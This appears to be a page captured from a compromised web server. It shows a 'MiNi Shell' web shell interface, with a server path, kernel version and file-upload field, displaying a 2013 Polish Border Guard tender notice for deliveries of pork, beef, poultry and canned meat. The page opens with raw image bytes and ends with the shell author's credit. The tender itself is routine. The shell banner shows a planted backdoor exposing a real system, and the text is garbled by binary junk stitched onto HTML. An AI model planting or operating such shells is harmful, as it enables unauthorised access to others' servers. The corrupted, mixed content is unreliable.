JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130201/44768-N-2013.html

<p class="kh_header"><b>Kętrzyn: Dostawy mięsa wieprzowego, wołowego i przetworów mięsnych; drobiu i przetworów drobiowych z indyka i kurczaka; konserw mięsnych i pasztetów w puszkach do Warmińsko-Mazurskiego Oddziału Straży Granicznej.</b><br>
<b>Numer ogłoszenia: 44768 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Warmińsko-Mazurski Oddział Straży Granicznej w Kętrzynie , ul. Gen. Władysława Sikorskiego 78, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 89 750 31 88, faks 89 750 37 54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wm.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy mięsa wieprzowego, wołowego i przetworów mięsnych; drobiu i przetworów drobiowych z indyka i kurczaka; konserw mięsnych i pasztetów w puszkach do Warmińsko-Mazurskiego Oddziału Straży Granicznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy mięsa wieprzowego, wołowego i przetworów mięsnych; drobiu i przetworów drobiowych z indyka i kurczaka; konserw mięsnych i pasztetów w puszkach do Warmińsko-Mazurskiego Oddziału Straży Granicznej.
2.	Opis przedmiotu zamówienia stanowi dla poszczególnych zestawów załącznik nr 1a, 1b, 1c do SIWZ.
3.	Zamawiający dopuszcza możliwości składania ofert częściowych na jeden lub więcej zestawów:
3.1. Zestaw nr 1 - Mięso wieprzowe, wołowe i przetwory mięsne (załącznik nr 1a do SIWZ),
3.2. Zestaw nr 2 - Drób i przetwory drobiowe z indyka i kurczaka (załącznik nr 1b do SIWZ),
3.3. Zestaw nr 3 - Konserwy mięsne i pasztety w puszkach (załącznik nr 1c do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.11.10.00-9, 15.11.40.00-0, 15.41.21.00-0, 15.13.12.10-0, 15.13.11.30-5, 15.13.12.00-7, 15.11.21.30-6, 15.13.11.35-0, 15.13.13.10-1, 15.11.21.20-3, 15.13.10.00-5, 15.13.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje  warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje  warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje  warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje  warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje  warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenie Wykonawcy o powierzeniu wykonania części zamówienia podwykonawcom zgodnie z załącznikiem nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany postanowień umowy w następujących przypadkach:
1)	zmiana nazwy firmy Wykonawcy i Zamawiającego,
2)	zmiana adresu siedziby firmy Wykonawcy i Zamawiającego,
3)	zmiana osób reprezentujących Wykonawcę i Zamawiającego.
2.  O zmianach określonych w ust. 1  strony informują się w formie pisemnej. Zmiany określone w ust.1 pkt 2, 3 nie wymagają zawarcia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wm.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warmińsko-Mazurski Oddział Straży Granicznej im. gen. bryg. Stefana Pasławskiego, ul. Gen. Władysława Sikorskiego 78, 11-400 Kętrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego - Kancelaria Jawna - pokój 118 W-MOSG lub przesłać na adres: W-MOSG im. gen. bryg. Stefana Pasławskiego, ul. Gen. W. Sikorskiego 78, 11-400 Kętrzyn..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MIĘSO WIEPRZOWE, WOŁOWE I PRZETWORY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab wieprzowy (bez kości) -PN-86/A-82002- 700 kg
Karkówka wieprzowa (bez kości) -PN-86/A-82002- 800 kg
Łopatka wieprzowa (bez kości, tłuszczu i skóry) -PN-86/A-82002 - 1200 kg
Szynka wieprzowa (bez kości, tłuszczu i skóry) -PN-86/A-82002- 1000 kg
Udziec wołowy (bez kości, Extra)-PN -88/A-82003 - 500 kg
Antrykot wołowy (bez kości, krąg) -PN -88/A-82003- 500 kg
Goleń wołowa przednia (bez kości, pręga wołowa b/k) -PN -88/A-82003- 300 kg
Wątroba wieprzowa (świeża) - 500 kg
Boczek surowy świeży (bez skóry) -PN-86/A-82002- 200 kg
Słonina świeża (bez skóry,  I- klasa)-PN-86/A-82002- 300 kg
Żeberka  wieprzowe (paski, Ekstra) -PN-86/A-82002- 500 kg
Smalec -PN-90/A-85802 - 300 kg
Szynka wiejska (wieprzowa, wędzona, parzona, wytworzona z elementów szynki  bez kości, wiązana sznurkiem,  barwa jasno brązowa z połyskiem, waga 1 sztuki od 1,5 do 2,5kg, nadająca się do krojenia maszynowego) -PN-A-82007 - 500 kg
Szynka z beczki (wieprzowa, wędzona, wytworzona z szynki bez kości wiązana sznurkiem, barwa ciemnowiśniowa, waga 1 sztuki od 1,9 do 2,9kg, nadająca się do krojenia maszynowego) -PN-A-82007 - 300 kg
 Baleron wieprzowy (wędzony parzony ,wytworzony z karkówki bez kości, barwa  jasno brązowa do brązowej, waga 1 sztuki od 2,0 do 2,8kg, nadający się do krojenia maszynowego) -PN-A-82007-500 kg
 Polędwica sopocka (wędzona, parzona, wytworzona ze schabu bez kości tłuszczu i skóry,  barwa brązowa do jasno wiśniowej, waga 1 sztuki od 1,2 do 2,0 kg, nadająca się do krojenia maszynowego) -PN-A-82007 - 500 kg
Polędwica z beczki (wędzona, parzona, wytworzona ze schabu bez kości tłuszczu i skóry,  barwa brązowa do ciemnej wiśni, waga 1 sztuki od 1,0 do 2,0 kg, nadająca się do krojenia maszynowego) -PN-A-82007- 300 kg
Kiełbasa żywiecka podsuszana (wędzona, parzona, grubo rozdrobniona, czysto wieprzowa, baton w osłonce białkowej o długości od 25 do 28 cm, barwa powierzchni brązowa do ciemnobrązowej, waga 1 sztuki od 0,75 do 0,85kg, nadająca się do krojenia maszynowego) -PN-A-82007- 400 kg
Kiełbasa szynkowa  (wędzona, parzona, grubo rozdrobniona, czysto wieprzowa, baton w osłonce białkowej w kształcie walca o długości od 24 do 26 cm, waga 1 sztuki od 1 do 1,2 kg, nadająca się do krojenia maszynowego) - PN-A- 82007 - 400 kg
Kiełbasa podwawelska wieprzowa (średnio rozdrobniona, czysto wieprzowa, parzona, wędzona, batony w jelitach naturalnych wieprzowych  O od 26 do 28mm, odkręcane do długości 30-35cm, barwa jasnobrązowa, waga 1 sztuki od 150 do 160g)  -PN-A-82007- 700 kg
Kiełbasa śląska (średnio rozdrobniona, czysto wieprzowa, parzona, wędzona, batony w jelitach naturalnych wieprzowych  O od 26 do 28mm, odkręcane do długości 12cm, barwa jasnobrązowa, waga 1 sztuki od 75 do 90g) - -PN-A-82007-300 kg
Schab w posypce (wytworzony ze schabu bez kości tłuszczu i skóry, parzony, kształt zbliżony do prostokąta, obsypany posypką smakowo-zapachową z każdej strony,  waga 1 sztuki od 1,0 do 1,8kg, nadający się do krojenia maszynowego) -PN-A-82007- 400 kg
Karczek (wytworzony z karkówki wieprzowej bez kości, parzony, pieczony, z posypką smakowo-zapachową na całej powierzchni, waga 1 sztuki od 1,8 do 2,5kg, nadający się do krojenia maszynowego) -PN-A-82007- 200 kg
Parówki śniadaniowe  (wieprzowo-wołowe, wędzone, parzone, batony w osłonkach celulozowych, odkręcane do długości 12cm i średnicy 19mm barwa jasnobrązowa, waga 1 sztuki od 50 do 60g) -PNA82007 - 500 kg
Kiełbasa biała, parzona (średnio rozdrobniona, z mięsa wieprzowo-wołowego, w jelitach naturalnych wieprzowych O od 26 do 28mm, odkręcane do długości 13 cm, waga 1 sztuki od 90 do 100g ) -PN-A-82007- 300 kg
Boczek  wędzony,(wieprzowy parzony, wytworzony z boczku wieprzowego bez kości, waga 1 sztuki od 1,5 do 2,5 kg)  -PN-A-82007- 400 kg
Kiełbaski,  (średnio rozdrobnione, czysto wieprzowe, parzone, batony  odkręcane do długości 10 cm i średnicy od 10 do 12 mm, barwa jasnobrązowa, waga 1 sztuki od 35 do 40g) -PN-A-82007 - 300 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.11.10.00-9, 15.11.40.00-0, 15.41.21.00-0, 15.13.11.30-5, 15.13.12.00-7, 15.13.12.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DRÓB I PRZETWORY DROBIOWE Z INDYKA I KURCZAKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z piersi indyka, surowy (świeży, bez kości) PN-A-86524- 800 kg
Filet z piersi kurczaka, surowy (świeży , bez kości) PN-A-86524- 1300 kg
Noga kurczaka  (surowa, świeża o wadze 1 porcji 220-320g) PN-A-86524- 2000 kg
Podudzie z kurczaka (surowe, świeże o wadze 1 porcji  120 -150 g) PN-A-86524- 500 kg
Kurczak, surowy, świeży PN-A-86524- 200 kg
Skrzydełka z kurczaka, surowe, (świeże ) PN-A-86524- 1000 kg
Filet z piersi indyka, (wędzony, parzony, uformowany  w  kształt piersi indyczej) - PN-A-86526- 500 kg
Kiełbasa złota  (cienka, średnio rozdrobniona, wędzona, parzona, wyłącznie  z mięsa drobiowego, nadająca się do spożycia na zimno i  ciepło) - PN-A-86526- 500 kg
Kiełbasa szynkowa drobiowa (w kształcie batonu) - PN-A-86526- 700 kg
Szynka z piersi indyka (wytworzona z mięsa jasnego, w kształcie bloku) - PN-A-86526- 300 kg
Szynka mozaika (wytworzona z mięsa indyczego w kształcie batonu, z rysunkiem mozaiki, z białym i czerwonym mięsem indyczym na przekroju) - PN-A-86526- 600 kg
Polędwica miodowa (wytworzona z mięsa indyczego w kształcie batonu w osłonce barierowej o przekroju od 75 do 85mm) - PN-A-86526- 400 kg
Szynka konserwowa drobiowa (wytworzona z mięsa udowego w osłonce barierowej, parzona) - PN-A-86526 - 500 kg
Parówki drobiowe Hot-dog (w osłonce celulozowej z nadrukiem tapetowym o przekroju 20mm i długości od 17 do 19cm, parzone, wędzone)  - PN-A-86526- 1000 kg
Serdelki z indyka (w osłonce naturalnej)  - PN-A-86526- 300 kg
Mortadela  (delikatesowa, z papryką lub z pieczarkami w kształcie batonu, wytworzona wyłącznie z mięsa drobiowego)
- PN-A-86526- 200 kg
Pasztet drobiowy (wyprodukowany wyłącznie z mięsa drobiowego) - 300 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.20-3, 15.11.21.30-6, 15.13.11.35-0, 15.13.13.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KONSERWY MIĘSNE I PASZTETY W PUSZKACH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwa mięsna- Gulasz angielski - (Premium, opakowanie puszka okrągła 300g - łatwo otwieralna, skład: mięso wieprzowe min. 92%) -PN-A-82022- 4000 kg
Konserwa mięsna- Gulasz angielski - (Medium, opakowanie puszka okrągła 190 -200g - łatwo otwieralna, skład: mięso wieprzowe min.70%) -PN-A-82022- 3000 kg
Pasta sandwiczowa z kurcząt (opakowanie puszka okrągła 150 - 170g - łatwo otwieralna) - 200 kg
Pasztet z kurcząt (opakowanie puszka okrągła  od 50 do 80g łatwo otwieralna) - 200 kg
 Konserwa - Szynka z indyka  (wyprodukowana tylko z mięsa drobiowego, opakowanie kubek   od 100 do 150g łatwo otwieralny) - 400 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.13.13.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com